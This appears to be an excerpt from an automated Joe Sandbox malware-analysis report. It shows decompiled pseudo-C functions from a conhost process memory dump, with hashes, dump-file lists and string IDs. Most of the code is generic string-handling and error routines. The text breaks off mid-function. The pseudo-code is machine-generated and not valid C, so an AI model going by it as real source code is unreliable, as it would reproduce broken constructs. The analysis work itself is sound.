                        Function 00007FF6935C62A0 Relevance: 12.9, Strings: 10, Instructions: 392COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00007FF67FF6935C62A0(void* __rax, void* __rcx) {
				signed int _t4;
				void* _t5;
				void* _t7;
				signed char* _t16;

				_t16 =  *((intOrPtr*)(__rcx + 0x18));
				_t4 =  *_t16 & 0x000000ff;
				_t7 = _t4 - 0x55;
				if (_t7 == 0) goto 0x935c63a0;
				if (_t7 > 0) goto 0x935c6308;
				if (_t4 == 0x4e) goto 0x935c65a0;
				if (_t4 != 0x53) goto 0x935c63b8;
				if (_t16[1] == 0x74) goto 0x935c6440;
				_t5 = E00007FF67FF6935C4B80(0, __rcx);
				if ( *((char*)( *((intOrPtr*)(__rcx + 0x18)))) == 0x49) goto 0x935c640c;
				return _t5;
			}







                        0x7ff6935c62ac
                        0x7ff6935c62b0
                        0x7ff6935c62b6
                        0x7ff6935c62b8
                        0x7ff6935c62be
                        0x7ff6935c62c2
                        0x7ff6935c62ca
                        0x7ff6935c62d4
                        0x7ff6935c62dc
                        0x7ff6935c62ec
                        0x7ff6935c6301

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID: D$E$E$I$M$S$S$T$std$string literal
                        • API String ID: 0-2655410955
                        • Opcode ID: 1a375f255fb9d92bbdc16474ee812111674dd9c226e41520a532518c1ab90af4
                        • Instruction ID: b7f32753a2d0fca3d709ed5643e27fa08a78237e062b94a17601dcba2818b786
                        • Opcode Fuzzy Hash: 1a375f255fb9d92bbdc16474ee812111674dd9c226e41520a532518c1ab90af4
                        • Instruction Fuzzy Hash: F5E1C772E0964245FF718A15D44ABBE27D9EB687CCF9940B1DA0C97786DE3CE681C380
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935D62A0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 35windowCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00007FF67FF6935D62A0(void* __rcx) {
				long _t1;

				_t1 = GetLastError();
				if (_t1 != 0) goto 0x935d62c0;
				return _t1;
			}




                        0x7ff6935d62aa
                        0x7ff6935d62b2
                        0x7ff6935d62bb

                        APIs
                        Strings
                        • aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaAaaAaaAAaAAaaaaaaaAaaaAAAAAaaaa, xrefs: 00007FF6935D62A2
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: DebuggerErrorFormatLastMessagePresent
                        • String ID: aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaAaaAaaAAaAAaaaaaaaAaaaAAAAAaaaa
                        • API String ID: 2392558662-3758742686
                        • Opcode ID: 46863d4f8d5c7508d4a1ac3b5574c831b5307448c888aaafa5bcc8e365fc6c90
                        • Instruction ID: 0d836aab5df566f5c64a107600a99c85943806714a9a2093cf5ae754420f06f4
                        • Opcode Fuzzy Hash: 46863d4f8d5c7508d4a1ac3b5574c831b5307448c888aaafa5bcc8e365fc6c90
                        • Instruction Fuzzy Hash: 12018131A0CA0281F7718B26F8473292368FF88B86F580079DA6DE7668EF3CD0459700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935DE410 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 1335COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 86%
                        			E00007FF67FF6935DE410(void* __edx, void* __rcx, long long __r8, signed int* __r9, intOrPtr _a40, intOrPtr _a48, long long _a56, long long _a64) {
				intOrPtr _v176;
				signed int _v180;
				long long _v192;
				long long _v200;
				long long _v208;
				intOrPtr _v216;
				signed int _t16;
				void* _t17;
				signed int _t23;
				void* _t24;

				asm("movaps [esp+0xa0], xmm6");
				_t23 =  *__r9;
				_v216 = _a40;
				_v192 = __r8;
				_v176 = _a48;
				_v208 = _a56;
				_v200 = _a64;
				 *__r9 = _t23 & 0xffffffcf;
				_t16 = _t23 & 0x00000007;
				_t24 = _t16 - 3;
				if (_t24 == 0) goto 0x935de740;
				_v180 = _t23 & 0x00000004;
				if (_t24 != 0) goto 0x935de4c0;
				if (_t16 == 0) goto 0x935de710;
				_t17 = _t16 - 1;
				if (_t17 - 1 <= 0) goto 0x935de508;
				asm("movaps xmm6, [esp+0xa0]");
				return _t17;
			}













                        0x7ff6935de423
                        0x7ff6935de432
                        0x7ff6935de435
                        0x7ff6935de445
                        0x7ff6935de44d
                        0x7ff6935de459
                        0x7ff6935de466
                        0x7ff6935de470
                        0x7ff6935de475
                        0x7ff6935de478
                        0x7ff6935de47b
                        0x7ff6935de486
                        0x7ff6935de48a
                        0x7ff6935de48e
                        0x7ff6935de494
                        0x7ff6935de49c
                        0x7ff6935de49e
                        0x7ff6935de4bc

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID: $ $Infinity$NaN
                        • API String ID: 0-3274152445
                        • Opcode ID: 1a0720c5de401bbc20e39417c0624ab467bb66ea8f532059a9948cbdecbdcc6f
                        • Instruction ID: d466c7dc73dc7f3b794a7099978520c9e427de6bf171a4a8276f19debf788257
                        • Opcode Fuzzy Hash: 1a0720c5de401bbc20e39417c0624ab467bb66ea8f532059a9948cbdecbdcc6f
                        • Instruction Fuzzy Hash: 73C2D932A1D6818AE731CF25E44132EB7A4FB89784F148176EA5DA7B99DF3DE4418F00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935E7430 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 73stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 46%
                        			E00007FF67FF6935E7430(long long* __rcx, void* __rdx, void* __r8, void* __r9, void* _a40) {

				if (__r9 - 0xfffffff9 + __r8 - __rdx -  *((intOrPtr*)( *((intOrPtr*)(__rcx)) - 0x18)) > 0) goto 0x935e74b0;
				E00007FF67FF6935E78B0(__rcx, __rdx -  *((intOrPtr*)(__rcx)), __r8 - __rdx, __r9);
				if (__r9 == 0) goto 0x935e748e;
				if (__r9 == 1) goto 0x935e74a0;
				return memset(??, ??, ??);
			}



                        0x7ff6935e7463
                        0x7ff6935e746b
                        0x7ff6935e7473
                        0x7ff6935e7480
                        0x7ff6935e749a

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpymemsetstrlen
                        • String ID: basic_string::_M_replace_aux
                        • API String ID: 160209724-2536181960
                        • Opcode ID: 5f08d7c5b45ef242c5415bd1fcc40663e3473304bf3f260c443137018827165d
                        • Instruction ID: 9671d78589e0e7b7e9b254c48ed9473189287e34d6ecd3a80d150767c33effdc
                        • Opcode Fuzzy Hash: 5f08d7c5b45ef242c5415bd1fcc40663e3473304bf3f260c443137018827165d
                        • Instruction Fuzzy Hash: 52113A43F592A411E831AA6B7C064F95614AB5EFF4E884371EE5C67791EC3CD482C300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935E7500 Relevance: 2.5, Strings: 2, Instructions: 34COMMON
                        Download Yara Rule
                        C-Code - Quality: 37%
                        			E00007FF67FF6935E7500(long long* __rcx, void* __rdx, void* __r8, void* __r9, intOrPtr _a40) {
				void* _t5;
				intOrPtr _t24;
				intOrPtr _t27;
				intOrPtr _t35;

				_t27 = _a40;
				_t24 =  *((intOrPtr*)(__rcx));
				_t35 =  *((intOrPtr*)(_t24 - 0x18));
				if (__rdx - _t35 > 0) goto 0x935e76cf;
				_t30 =  >  ? __r8 : _t35 - __rdx;
				if (_t27 - 0xfffffff9 - _t35 + ( >  ? __r8 : _t35 - __rdx) > 0) goto 0x935e76c3;
				if (_t24 - __r9 > 0) goto 0x935e7570;
				if (__r9 - _t35 + _t24 > 0) goto 0x935e7570;
				if ( *((intOrPtr*)(_t24 - 8)) <= 0) goto 0x935e75b8;
				_t5 = E00007FF67FF6935E78B0(__rcx, __rdx,  >  ? __r8 : _t35 - __rdx, _t27);
				if (_t27 == 0) goto 0x935e75a2;
				if (_t27 == 1) goto 0x935e7620;
				0x935e0a38();
				return _t5;
			}







                        0x7ff6935e750d
                        0x7ff6935e7518
                        0x7ff6935e7521
                        0x7ff6935e7528
                        0x7ff6935e7541
                        0x7ff6935e754e
                        0x7ff6935e7557
                        0x7ff6935e755f
                        0x7ff6935e7566
                        0x7ff6935e757c
                        0x7ff6935e7584
                        0x7ff6935e7591
                        0x7ff6935e759d
                        0x7ff6935e75b2

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
                        • API String ID: 0-3564965661
                        • Opcode ID: 178b3a1b4b1b6603e235a1ab5da007ed65b7711bd794bcd9a19c29cc5c4113ff
                        • Instruction ID: fa1e5da1f2fb49f108013bc25d30e64e908b8331d800b92b8240d0ef07639ba1
                        • Opcode Fuzzy Hash: 178b3a1b4b1b6603e235a1ab5da007ed65b7711bd794bcd9a19c29cc5c4113ff
                        • Instruction Fuzzy Hash: 3FF03052F08A46A1D920AF67D8065FAA725FB5EBC8F445072EE0C6B366DE2CD111C340
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935EE4F0 Relevance: 2.5, Strings: 2, Instructions: 33COMMON
                        Download Yara Rule
                        C-Code - Quality: 68%
                        			E00007FF67FF6935EE4F0(void* __rcx, intOrPtr* __rdx, signed int __r8, void* __r9) {
				long long _v24;
				void* _t8;
				void* _t13;
				intOrPtr _t22;

				_t22 =  *((intOrPtr*)(__rdx + 8));
				_t13 = _t22 - __r8;
				_t20 =  <=  ? _t13 : __r9;
				if (__r8 - _t22 > 0) goto 0x935ee526;
				_v24 =  <=  ? _t13 : __r9;
				return E00007FF67FF6935ED220(0, _t8, __rcx, __rdx,  *((intOrPtr*)(__rcx + 8)),  *__rdx + __r8 * 2);
			}







                        0x7ff6935ee4f4
                        0x7ff6935ee4fb
                        0x7ff6935ee501
                        0x7ff6935ee50b
                        0x7ff6935ee50d
                        0x7ff6935ee525

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpy
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::assign
                        • API String ID: 3510742995-2669816585
                        • Opcode ID: d796db268a802fa17d275661f35f7593e2c08a649134d65a8ca2d112d22d4a8f
                        • Instruction ID: 54a874d6dac3e0fed9ac2a366b43b09b2329c6fff0c54293a43b39a0c4412756
                        • Opcode Fuzzy Hash: d796db268a802fa17d275661f35f7593e2c08a649134d65a8ca2d112d22d4a8f
                        • Instruction Fuzzy Hash: 5FF090A6E04B8595D620AF65E8020ACA365F75DF44F88A572EE4C63321DF3CD566C700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935EB330 Relevance: 2.5, Strings: 2, Instructions: 33COMMON
                        Download Yara Rule
                        C-Code - Quality: 68%
                        			E00007FF67FF6935EB330(void* __rcx, intOrPtr* __rdx, void* __r8, void* __r9) {
				long long _v24;
				void* _t7;
				void* _t12;
				intOrPtr _t21;

				_t21 =  *((intOrPtr*)(__rdx + 8));
				_t12 = _t21 - __r8;
				_t19 =  <=  ? _t12 : __r9;
				if (__r8 - _t21 > 0) goto 0x935eb366;
				_v24 =  <=  ? _t12 : __r9;
				return E00007FF67FF6935EA150(0, _t7, __rcx, __rdx,  *((intOrPtr*)(__rcx + 8)),  *__rdx + __r8);
			}







                        0x7ff6935eb334
                        0x7ff6935eb33b
                        0x7ff6935eb341
                        0x7ff6935eb34b
                        0x7ff6935eb34d
                        0x7ff6935eb365

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpy
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::assign
                        • API String ID: 3510742995-2669816585
                        • Opcode ID: 5054e097d87ac96f7cb638d309eced32f40e760cbb4a9381c2bbfca1d581737b
                        • Instruction ID: df82e9519ea94e304d91a60713a3f5d4b45788d638ff6b3a3038773799dd2ba6
                        • Opcode Fuzzy Hash: 5054e097d87ac96f7cb638d309eced32f40e760cbb4a9381c2bbfca1d581737b
                        • Instruction Fuzzy Hash: D3F090AAE05BC595D620AFA5D8020ECB364F75DF84F895172DA4C63321DF3CD666C700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935E4860 Relevance: 2.5, Strings: 2, Instructions: 32COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00007FF67FF6935E4860(signed int** __rcx, intOrPtr* __rdx, void* __r8, void* __r9) {
				intOrPtr _t8;

				_t8 =  *((intOrPtr*)(__rdx + 8));
				if (__r8 - _t8 > 0) goto 0x935e48a6;
				 *((long long*)(__rcx)) = __rcx + 0x10;
				_t10 =  >  ? __r9 : _t8 - __r8;
				r9d = 0;
				return E00007FF67FF6935EA640(__rcx,  *__rdx + __r8,  *__rdx + __r8 + ( >  ? __r9 : _t8 - __r8));
			}




                        0x7ff6935e4866
                        0x7ff6935e4870
                        0x7ff6935e4879
                        0x7ff6935e4886
                        0x7ff6935e488d
                        0x7ff6935e48a5

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
                        • API String ID: 0-3532027576
                        • Opcode ID: d063a21194f5820915c53b49d25065e468c9214c46aec8abfa25f0a4d6335fbf
                        • Instruction ID: 109f7ce92bbd5974dc2bbf4784af215e4064b4f51e8fdd11cda5bbe8b115b2ff
                        • Opcode Fuzzy Hash: d063a21194f5820915c53b49d25065e468c9214c46aec8abfa25f0a4d6335fbf
                        • Instruction Fuzzy Hash: F1F0E252F0474691EE20DFAAE4915B97324F769BC4B902472C90D63320EE3CE151D344
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935E18B0 Relevance: 1.9, APIs: 1, Instructions: 383COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00007FF67FF6935E18B0(signed int __eax, void* __ecx, signed int __edx, void* __r8, void* __r9, signed int _a16, intOrPtr _a40) {
				long long _v152;
				intOrPtr _v156;
				signed char _v200;
				long long _v208;
				long long _v216;
				long long _v224;
				void* _t24;
				void* _t33;
				long long _t49;

				_a16 = __edx;
				_v152 = 0;
				_v156 = 0;
				if (__ecx != 1) goto 0x935e1988;
				_v216 = 0xbcd4d500 + __r8;
				_v224 = 0xbcd4d500 - 1 < 0;
				_t33 = __edx - 6;
				_v200 = (__eax & 0xffffff00 | _t33 == 0x00000000) & dil;
				if (_t33 == 0) goto 0x935e19a8;
				_t49 =  *((intOrPtr*)(__r9 - 0x10));
				if (_t49 == 0) goto 0x935e1b4e;
				_v208 =  *((intOrPtr*)(__r9 - 0x18));
				if ( *((intOrPtr*)(__r9 - 0x24)) < 0) goto 0x935e1bd3;
				_v224 = _t49;
				E00007FF67FF6935CEF80(E00007FF67FF6935CEF30(E00007FF67FF6935CEF30((__eax & 0xffffff00 | _t33 == 0x00000000) & dil, __edx ^ __edx, _a40, __r9), 1, _a40,  *((intOrPtr*)(__r9 - 0x24))), _t24, _a40, _v224);
				goto 0x935e198d;
				return 3;
			}












                        0x7ff6935e18cb
                        0x7ff6935e18d5
                        0x7ff6935e18de
                        0x7ff6935e18e9
                        0x7ff6935e1900
                        0x7ff6935e1905
                        0x7ff6935e190a
                        0x7ff6935e1918
                        0x7ff6935e191c
                        0x7ff6935e1922
                        0x7ff6935e1929
                        0x7ff6935e1937
                        0x7ff6935e193e
                        0x7ff6935e1950
                        0x7ff6935e1975
                        0x7ff6935e197f
                        0x7ff6935e19a0

                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7539445407be5b8fb7c9c51e2a3a62ac00e8785209f4a8e1cea80bea5e2149f5
                        • Instruction ID: fefeb5661aacfdb4c688aa5ac68977fbee9f70b272aafdbc53e64a61d3c73530
                        • Opcode Fuzzy Hash: 7539445407be5b8fb7c9c51e2a3a62ac00e8785209f4a8e1cea80bea5e2149f5
                        • Instruction Fuzzy Hash: 3BF1C322A0DB9151EB749B11E4023BEABA9FB897C4F4440B5EE8DD7B85DF3CD6448B40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935D6770 Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: Time$FileSystem
                        • String ID:
                        • API String ID: 2086374402-0
                        • Opcode ID: 548d6c5561f1d63b6eeacdc276154b9acb0c4f1ca1d437845f35bf51bfa6a507
                        • Instruction ID: b2ce4256bb0be50901907420a34aa165a24219a307d6e95d1753fc55e591a180
                        • Opcode Fuzzy Hash: 548d6c5561f1d63b6eeacdc276154b9acb0c4f1ca1d437845f35bf51bfa6a507
                        • Instruction Fuzzy Hash: 4CD012A6B1864987DE20CB42F5421556762D7DC7E5B404120EE5D93738DE3CEA568F00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935F17C0 Relevance: 1.4, APIs: 1, Instructions: 191COMMON
                        Download Yara Rule
                        C-Code - Quality: 73%
                        			E00007FF67FF6935F17C0() {
				long long _v296;
				void* _t51;
				void* _t53;
				void* _t54;
				int _t56;
				long long* _t65;
				void* _t66;
				void* _t67;
				int _t75;
				void* _t120;
				int _t121;
				int _t122;
				int _t123;
				int _t124;
				int _t125;
				int _t130;

				E00007FF67FF6935F0CD0(_t53, _t54, _t56, _t67);
				_t121 = _t56;
				E00007FF67FF6935E9440(_t56, _t67);
				E00007FF67FF6935F1490(0x10, _t51, _t56, _t66, _t121, 0x935f8b90, 0x7ff6935e9560, _t120, _t121, _t67);
				_t128 = _t56;
				E00007FF67FF6935F1020(_t121);
				E00007FF67FF6935CF280();
				_push(_t56);
				_push(_t121);
				E00007FF67FF6935F0CD0(_t53, _t54, _t56, _t128);
				_t122 = _t56;
				E00007FF67FF6935E95C0(_t56, _t128);
				E00007FF67FF6935F1490(0x10, _t51, _t56, _t66, _t122, 0x935f8bb0, 0x7ff6935e96e0, _t120, _t122, _t128);
				_t130 = _t56;
				E00007FF67FF6935F1020(_t122);
				_t75 = _t130;
				E00007FF67FF6935CF280();
				_push(_t130);
				_push(_t122);
				E00007FF67FF6935F0CD0(_t53, _t54, _t56, _t75);
				_t123 = _t56;
				E00007FF67FF6935E9AD0(_t56, _t75);
				E00007FF67FF6935F1490(0x10, _t51, _t56, _t66, _t123, 0x935f8bf0, 0x7ff6935e9c00, _t120, _t123, _t75);
				_t132 = _t56;
				E00007FF67FF6935F1020(_t123);
				E00007FF67FF6935CF280();
				_push(_t56);
				_push(_t123);
				E00007FF67FF6935F0CD0(_t53, _t54, _t56, _t132);
				_t124 = _t56;
				E00007FF67FF6935E8B80(_t56, _t132);
				E00007FF67FF6935F1490(0x10, _t51, _t56, _t66, _t124, 0x935f8b50, 0x7ff6935e8ca0, _t120, _t124, _t132);
				_t134 = _t56;
				E00007FF67FF6935F1020(_t124);
				E00007FF67FF6935CF280();
				_push(_t56);
				_push(_t124);
				E00007FF67FF6935F0CD0(_t53, _t54, _t56, _t134);
				_t125 = _t56;
				E00007FF67FF6935E9CA0(_t56, _t134);
				E00007FF67FF6935F1490(0x10, _t51, _t56, _t66, _t125, 0x935f8c10, 0x7ff6935e9dc0, _t120, _t125, _t134);
				_t136 = _t56;
				E00007FF67FF6935F1020(_t125);
				E00007FF67FF6935CF280();
				_push(_t56);
				E00007FF67FF6935F0CD0(_t53, _t54, _t56, _t136);
				_t126 = _t56;
				E00007FF67FF6935E9E20(_t56, _t136);
				E00007FF67FF6935F1490(0x10, _t51, _t56, _t66, _t56, 0x935f8c30, 0x7ff6935e9f40, _t120, _t56, _t136);
